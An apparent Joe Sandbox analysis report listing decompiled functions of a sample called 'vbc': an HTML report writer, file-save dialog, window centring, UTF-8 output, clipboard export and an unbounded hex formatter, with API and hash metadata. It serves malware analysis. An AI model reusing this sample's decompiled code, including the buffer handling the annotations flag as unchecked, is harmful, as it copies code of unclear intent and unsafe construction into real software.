                                                                                                                                                    0x0040e25d 0x0040e265 0x0040e267 0x0040e271 0x0040e395 0x0040e39b 0x0040e3a1 0x0040e3aa 0x0040e3ad 0x0040e3c0
                                                                                                                                                    0x0040e3c7 0x0040e3cd 0x0040e44a 0x0040e3e2 0x0040e3ed 0x0040e401 0x0040e407 0x0040e412 0x0040e41b 0x0040e41e
                                                                                                                                                    0x0040e42b 0x0040e438 0x0040e444 0x00000000 0x0040e444 0x00000000 0x0040e438 0x00000000 0x0040e44a 0x0040e3ad
                                                                                                                                                    0x0040e283 0x0040e28c 0x0040e294 0x0040e297 0x0040e2a0 0x0040e2a1 0x0040e2ac 0x0040e2ad 0x0040e2b6 0x0040e2bc
                                                                                                                                                    0x0040e2bc 0x0040e2c0 0x0040e2c7 0x0040e2ca 0x0040e2d9 0x0040e2e2 0x0040e2e9 0x0040e2fb 0x0040e306 0x0040e30d
                                                                                                                                                    0x0040e311 0x0040e322 0x0040e328 0x0040e33a 0x0040e33f 0x0040e344 0x0040e345 0x0040e34b 0x0040e356 0x0040e35b
                                                                                                                                                    0x0040e361 0x0040e361 0x0040e375 0x00000000 0x00000000 0x0040e37b 0x0040e384 0x0040e2d7 0x00000000 0x00000000
                                                                                                                                                    0x0040e38a 0x00000000 0x0040e384 0x0040e2d9 0x0040e2ca 0x0040e44e 0x0040e451 0x0040e451 0x0040e297 0x0040e45e

                                                                                                                                                    APIs
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                                                                                                                    • memset.MSVCRT ref: 0040E2E9
                                                                                                                                                    • memset.MSVCRT ref: 0040E2FB
                                                                                                                                                      • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                                                                                                                    • memset.MSVCRT ref: 0040E3E2
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$strcpy$CloseHandleOpenProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3799309942-0
                                                                                                                                                    • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                                                                                    • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                                                                                                                    • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                                                                                                                    • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                    			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				char* _v12;
                                                                                                                                                    				signed int _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				signed int _v28;
                                                                                                                                                    				char _v48;
                                                                                                                                                    				char _v68;
                                                                                                                                                    				void _v96;
	void* __edi;
	signed int _t51;
	char* _t53;
	char* _t63;
	intOrPtr* _t69;
	signed int _t70;
	char _t84;
	intOrPtr* _t91;
	signed int _t95;
	void* _t96;
	void* _t97;

	_t69 = __ebx;
	_t70 = 6;
	memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
	_t97 = _t96 + 0xc;
	asm("movsw");
	asm("movsd");
	asm("movsd");
	asm("movsd");
	asm("movsd");
	asm("movsw");
	asm("movsb");
	E00405EFD(_a4, "<tr>");
	_t95 = 0;
	if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
		do {
			_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
			_v8 = _t51;
			_t53 =  &_v96;
			if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
				_t53 =  &_v48;
			}
			_t91 = _a8;
			_v28 = _v28 | 0xffffffff;
			_v24 = _v24 | 0xffffffff;
			_v20 = _v20 | 0xffffffff;
			_v16 = _v16 & 0x00000000;
			_v12 = _t53;
			 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
			E0040F071(_v28,  &_v68);
			E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
			 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
			_t63 =  *(_t69 + 0x50);
			_t84 =  *_t63;
			if(_t84 == 0 || _t84 == 0x20) {
				strcat(_t63, "&nbsp;");
			}
			E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
			sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
			E00405EFD(_a4,  *(_t69 + 0x4c));
			_t97 = _t97 + 0x20;
			_t95 = _t95 + 1;
		} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
	}
	return E00405EFD(_a4, 0x412b1c);
}

APIs
  • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
  • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
• strcat.MSVCRT(?,&nbsp;), ref: 0040942E
• sprintf.MSVCRT ref: 00409450
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileWritesprintfstrcatstrlen
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 3813295786-4153097237
• Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
• Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
• Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
• Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 73%
E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
	void* _v8;
	intOrPtr* _v12;
	intOrPtr _v24;
	intOrPtr _v28;
	intOrPtr _v32;
	intOrPtr _v288;
	intOrPtr _v800;
	char _v1568;
	char _v1824;
	intOrPtr _v1828;
	intOrPtr _v1840;
	intOrPtr _v1844;
	intOrPtr _v2100;
	intOrPtr _v2612;
	char _v3124;
	char _v3636;
	intOrPtr _v3640;
	void* _v5768;
	char _v5796;
	void* __ebx;
	void* __edi;
	void* __esi;
	char* _t39;
	intOrPtr _t51;
	int _t60;
	intOrPtr* _t73;
	int _t76;
	void* _t80;

	_t80 = __eflags;
	E004118A0(0x16a0, __ecx);
	_t39 = wcslen(_a8);
	_t2 =  &(_t39[1]); // 0x1
	_t76 = _t2;
	_push(_t76);
	L004115D0();
	_t60 = 0;
	_v8 = _t39;
	 *_t39 = 0;
	WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
	_t77 =  &_v5796;
	E0040FE05( &_v5796, _t80);
	_v5796 = 0x4144ac;
	E004104BC( &_v3636);
	E004104BC( &_v1824);
	_t73 = _a4;
	_v3640 =  *((intOrPtr*)(_t73 + 4));
	_v12 = _t73;
	_a8 = strlen(_v8);
	E0040FF76(_t47, _t77);
	memcpy(_v5768, _v8, _a8);
	E00410081(_t77, _t80);
	_t51 =  *((intOrPtr*)(_t73 + 4));
	_v1840 = _t51;
	_v28 = _t51;
	if(_v2100 != 0 || _v2612 != 0) {
		if(_v1844 != _t60) {
			if(_v1568 != _t60) {
				E004060D0(0xff,  &_v3124,  &_v1568);
				_t73 = _a4;
				_v1828 = _v24;
				_t60 = 0;
			}
			 *((intOrPtr*)( *_t73))( &_v3636);
		}
	}
	if(_v288 != _t60 || _v800 != _t60) {
		if(_v32 != _t60) {
			 *((intOrPtr*)( *_t73))( &_v1824);
		}
	}
	_push(_v8);
	L004115D6();
	return E0040FEED( &_v5796);
}


                                                                                                                                                    APIs
                                                                                                                                                    • wcslen.MSVCRT ref: 00410A9D
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                                                                                                      • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                                                                                                                    • strlen.MSVCRT ref: 00410B02
                                                                                                                                                      • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                                                                                                      • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                                                                                                                    • memcpy.MSVCRT ref: 00410B1C
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 577244452-0
                                                                                                                                                    • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                                                                                    • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                                                                                                                    • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                                                                                                                    • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                    				char _v8;
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                    				char* _v36;
                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                    				char* _v44;
                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                    				intOrPtr _v68;
                                                                                                                                                    				char _v72;
                                                                                                                                                    				void _v1095;
                                                                                                                                                    				char _v1096;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				char _t29;
                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                    				void* _t39;
                                                                                                                                                    				void* _t52;
                                                                                                                                                    				char _t59;
                                                                                                                                                    				char* _t60;
                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                    
                                                                                                                                                    				_v1096 = 0;
                                                                                                                                                    				memset( &_v1095, 0, 0x3ff);
                                                                                                                                                    				_v8 = 0x747874;
                                                                                                                                                    				_t29 = E004078FF(0x1f5);
                                                                                                                                                    				_t59 = "*.txt";
                                                                                                                                                    				_v72 = _t29;
                                                                                                                                                    				_v68 = _t59;
                                                                                                                                                    				_v64 = E004078FF(0x1f6);
                                                                                                                                                    				_v60 = _t59;
                                                                                                                                                    				_v56 = E004078FF(0x1f7);
                                                                                                                                                    				_v52 = _t59;
                                                                                                                                                    				_t32 = E004078FF(0x1f8);
                                                                                                                                                    				_t60 = "*.htm;*.html";
                                                                                                                                                    				_v48 = _t32;
                                                                                                                                                    				_v44 = _t60;
                                                                                                                                                    				_v40 = E004078FF(0x1f9);
                                                                                                                                                    				_v36 = _t60;
                                                                                                                                                    				_v32 = E004078FF(0x1fa);
                                                                                                                                                    				_v28 = "*.xml";
                                                                                                                                                    				_t35 = E004078FF(0x1fb);
                                                                                                                                                    				_t61 = "*.csv";
                                                                                                                                                    				_v24 = _t35;
                                                                                                                                                    				_v20 = _t61;
                                                                                                                                                    				_v16 = E004078FF(0x1fc);
                                                                                                                                                    				_v12 = _t61;
                                                                                                                                                    				E0040684D( &_v1096,  &_v72, 8);
                                                                                                                                                    				_t52 = 7;
                                                                                                                                                    				_t39 = E004078FF(_t52);
                                                                                                                                                    				_t23 =  &_v8; // 0x747874
                                                                                                                                                    				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
                                                                                                                                                    			}


                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040AB74
                                                                                                                                                      • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                                                                                                      • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                                                                      • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,75144DE0), ref: 0040797A
                                                                                                                                                      • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                                                                      • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                                                                                                                      • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                                                                                                                      • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                                                                                                                      • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
                                                                                                                                                      • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068C9
                                                                                                                                                      • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068D9
                                                                                                                                                      • Part of subcall function 00406680: GetSaveFileNameA.COMDLG32(?), ref: 004066CF
                                                                                                                                                      • Part of subcall function 00406680: strcpy.MSVCRT(?,?), ref: 004066E6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpystrlen$memsetstrcpy$FileLoadNameSaveStringsprintf
                                                                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                    • API String ID: 4021364944-3614832568
                                                                                                                                                    • Opcode ID: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                                                                                    • Instruction ID: 4d38638b85bcf07ffefc140bede2392a268d493de89ddae44be4c2da79bd640a
                                                                                                                                                    • Opcode Fuzzy Hash: 47d6f0de7c66cadcf7d9a44beb2654d42ee3cfb16f185572a55cd809b74eca63
                                                                                                                                                    • Instruction Fuzzy Hash: B62101B2D442589ECB01FF99D8857DDBBB4BB04304F10417BE619B7282D7381A45CB5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                     			// Centres window _a4 on the primary display: GetDeviceCaps(8) is HORZRES and
                                                                                                                                                     			// GetDeviceCaps(0xa) is VERTRES, so the call moves the window to
                                                                                                                                                     			// ((screen width - window width) / 2, (screen height - window height) / 2).
                                                                                                                                                     			// The two cdq instructions are the compiler's signed divide-by-two idiom; the
                                                                                                                                                     			// decompiler did not fold them, which is why "- _t36 >> 1" (edx after cdq, not a
                                                                                                                                                     			// function argument) and the duplicated "_v8" appear in the MoveWindow call.
                                                                                                                                                     			// GUI housekeeping of the unpacked tool, not malicious by itself.
                                                                                                                                                     			E00406491(void* __edx, struct HWND__* _a4) {
                                                                                                                                                     				int _v8;
                                                                                                                                                     				struct tagRECT _v24;
                                                                                                                                                     				int _t17;
                                                                                                                                                     				void* _t36;
                                                                                                                                                     				struct HDC__* _t38;
                                                                                                                                                     
                                                                                                                                                     				_t36 = __edx;
                                                                                                                                                     				_t38 = GetDC(0);
                                                                                                                                                     				_t17 = GetDeviceCaps(_t38, 8);
                                                                                                                                                     				_v8 = GetDeviceCaps(_t38, 0xa);
                                                                                                                                                     				ReleaseDC(0, _t38);
                                                                                                                                                     				GetWindowRect(_a4,  &_v24);
                                                                                                                                                     				asm("cdq");
                                                                                                                                                     				asm("cdq");
                                                                                                                                                     				return MoveWindow(_a4, _v24.left - _v24.right + _t17 - 1 - _t36 >> 1, _v24.top - _v24.bottom + _v8 - 1 - _v8 >> 1, _v24.right - _v24.left + 1, _v24.bottom - _v24.top + 1, 1);
                                                                                                                                                     			}

                                                                                                                                                     Instruction addresses (the report's side-by-side column, one per statement above, in order): 0x00406491 0x004064a8 0x004064ad 0x004064b9 0x004064bc 0x004064c9 0x004064e1 0x004064f5 0x00406511

                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 0040649C
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 004064AD
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004064B4
                                                                                                                                                    • ReleaseDC.USER32 ref: 004064BC
                                                                                                                                                    • GetWindowRect.USER32 ref: 004064C9
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00406507
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDeviceWindow$MoveRectRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3197862061-0
                                                                                                                                                    • Opcode ID: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                                                                                    • Instruction ID: 542b186de9fc11de55873c3549d90df3c6ab5362d14aa96611489808ae4c73e2
                                                                                                                                                    • Opcode Fuzzy Hash: 69bb305ff33d1457d4484e576323a0ef66f31560397ccb35d966ff8f0e758d9b
                                                                                                                                                    • Instruction Fuzzy Hash: FC117C31A0011AAFDB009BB9CE4DEEFBFB8EB84711F014165E901E7250D6B0AD01CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                     			// Writes one string to a file as UTF-8. _a8 (ANSI, current code page) is widened
                                                                                                                                                     			// with MultiByteToWideChar into a 0x4000-byte stack buffer, narrowed again with
                                                                                                                                                     			// WideCharToMultiByte(0xfde9 = CP_UTF8) into a 0x2000-byte buffer, and the result is
                                                                                                                                                     			// written to handle _a4 with WriteFile. Both conversions are capped at 0x1fff units,
                                                                                                                                                     			// so a line longer than that is not converted in full. E004118A0 is the stack probe
                                                                                                                                                     			// (__chkstk) for the large locals. This is the tool's text-output writer, which is
                                                                                                                                                     			// why a recovered output file should be parsed as UTF-8.
                                                                                                                                                     			E00403A8D(void* __ecx, void* __eflags, void* _a4, char* _a8) {
                                                                                                                                                     				long _v8;
                                                                                                                                                     				void _v8199;
                                                                                                                                                     				char _v8200;
                                                                                                                                                     				void _v24582;
                                                                                                                                                     				short _v24584;
                                                                                                                                                     
                                                                                                                                                     				E004118A0(0x6004, __ecx);
                                                                                                                                                     				_v24584 = 0;
                                                                                                                                                     				memset( &_v24582, 0, 0x3ffe);
                                                                                                                                                     				_v8200 = 0;
                                                                                                                                                     				memset( &_v8199, 0, 0x1fff);
                                                                                                                                                     				MultiByteToWideChar(0, 0, _a8, 0xffffffff,  &_v24584, 0x1fff);
                                                                                                                                                     				WideCharToMultiByte(0xfde9, 0,  &_v24584, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                                                                     				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                                                                     			}

                                                                                                                                                     Instruction addresses (the report's side-by-side column, one per statement above, in order): 0x00403a95 0x00403aab 0x00403ab2 0x00403ac5 0x00403acb 0x00403ae2 0x00403b01 0x00403b2d

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00403AB2
                                                                                                                                                    • memset.MSVCRT ref: 00403ACB
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AE2
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403B01
                                                                                                                                                    • strlen.MSVCRT ref: 00403B13
                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403B24
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1786725549-0
                                                                                                                                                    • Opcode ID: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                                                                                    • Instruction ID: d8056d974a042835a8b53dd5956248081512f57f3cb7fafeec888b91cb2496ed
                                                                                                                                                    • Opcode Fuzzy Hash: f625be7e6fa724cc13b0b56902c1b33cd6369ef039f23dbe168f1e8392359ec1
                                                                                                                                                    • Instruction Fuzzy Hash: 6A1161B244012CBEFB009B94DD85DEB77ADEF08354F0041A6B70AD2091D6349F94CB78
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                     			// Clipboard export through a temporary file. GetTempFileNameA with prefix "cp"
                                                                                                                                                     			// yields <temp dir>\cpXXXX.tmp (the Windows directory is used if GetTempPathA
                                                                                                                                                     			// fails). The name is passed to E0040AC47; on success the clipboard is opened for
                                                                                                                                                     			// the window handle stored at _t31+0x108, E00405FC6 is given the file name, a
                                                                                                                                                     			// non-zero result is handed to E00405F41 with the same window handle, and the
                                                                                                                                                     			// file is deleted with DeleteFileA. The temp file therefore exists only for the
                                                                                                                                                     			// duration of this call. _t32 and _t34 are flag temporaries the decompiler left
                                                                                                                                                     			// undeclared.
                                                                                                                                                     			E0040AC8A(void* __eax, void* __ebx) {
                                                                                                                                                     				char _v264;
                                                                                                                                                     				char _v524;
                                                                                                                                                     				void* __edi;
                                                                                                                                                     				void* __esi;
                                                                                                                                                     				long _t13;
                                                                                                                                                     				void* _t18;
                                                                                                                                                     				int _t19;
                                                                                                                                                     				long _t20;
                                                                                                                                                     				void* _t27;
                                                                                                                                                     				void* _t31;
                                                                                                                                                     
                                                                                                                                                     				_t27 = __ebx;
                                                                                                                                                     				_t31 = __eax;
                                                                                                                                                     				_t13 = GetTempPathA(0x104,  &_v524);
                                                                                                                                                     				_t32 = _t13;
                                                                                                                                                     				if(_t13 == 0) {
                                                                                                                                                     					GetWindowsDirectoryA( &_v524, 0x104);
                                                                                                                                                     				}
                                                                                                                                                     				_v264 = 0;
                                                                                                                                                     				GetTempFileNameA( &_v524, "cp", 0,  &_v264);
                                                                                                                                                     				_t18 = E0040AC47(_t31, _t32,  &_v264, 2, 1);
                                                                                                                                                     				if(_t18 != 0) {
                                                                                                                                                     					_t19 = OpenClipboard( *(_t31 + 0x108));
                                                                                                                                                     					_t34 = _t19;
                                                                                                                                                     					if(_t19 == 0) {
                                                                                                                                                     						_t20 = GetLastError();
                                                                                                                                                     					} else {
                                                                                                                                                     						_t20 = E00405FC6(_t27, 0x104, _t31, _t34,  &_v264);
                                                                                                                                                     					}
                                                                                                                                                     					if(_t20 != 0) {
                                                                                                                                                     						E00405F41(_t20,  *(_t31 + 0x108));
                                                                                                                                                     					}
                                                                                                                                                     					return DeleteFileA( &_v264);
                                                                                                                                                     				}
                                                                                                                                                     				return _t18;
                                                                                                                                                     			}

                                                                                                                                                     Instruction addresses (the report's side-by-side column, one per statement above, in order): 0x0040ac8a 0x0040ac95 0x0040aca4 0x0040acaa 0x0040acac 0x0040acb6 0x0040acb6 0x0040acd1 0x0040acd8 0x0040ace9 0x0040acf0 0x0040acf8 0x0040acfe 0x0040ad00 0x0040ad11 0x0040ad02 0x0040ad09 0x0040ad0e 0x0040ad19 0x0040ad21 0x0040ad26 0x00000000 0x0040ad2e 0x0040ad37

APIs
• GetTempPathA.KERNEL32(00000104,?), ref: 0040ACA4
• GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ACB6
• GetTempFileNameA.KERNEL32(?,0041341C,00000000,?), ref: 0040ACD8
• OpenClipboard.USER32(?), ref: 0040ACF8
• GetLastError.KERNEL32 ref: 0040AD11
• DeleteFileA.KERNEL32(00000000), ref: 0040AD2E
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
• String ID:
• API String ID: 2014771361-0
• Opcode ID: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
• Instruction ID: 1632bef886f39339d389646b63a05c30f7573d4ca20e624e383ab74febbb07e7
• Opcode Fuzzy Hash: 04f759ef316dfc5a7bfb4e8c49b84bbeab9ff02a57951bdc03c1b9a7e5f51390
• Instruction Fuzzy Hash: E0118272504318ABDB209B60DD49FDB77BC9F14701F0001B6F689E2091DBB8DAD4CB29
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
			/* Editor note: fixed-width hex formatter. Walks exactly 0x80 bytes at _a4 and
			   appends each as "%2.2X" to the caller-supplied buffer in __edi, separated by
			   one space, with two extra spaces before every byte whose index is a multiple
			   of _a8 (index 0 included, so the output starts with two spaces when _a8 > 0).
			   _push(...) followed by sprintf(...) is the decompiler's rendering of a single
			   sprintf(&_v260, "%2.2X", byte) call; _t37 tracks the stack pointer after each
			   cdecl call and is not program logic. No bound is ever checked on __edi. */
			E00406585(char* __edi, intOrPtr _a4, signed int _a8) {
				void _v259;
				char _v260;
				char* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_t37 = _t36 + 0xc;
				 *__edi = 0;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					sprintf( &_v260, "%2.2X");
					_t37 = _t37 + 0xc;
					if(_t35 > 0) {
						strcat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							strcat(_t34, "  ");
						}
					}
					strcat(_t34,  &_v260);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}
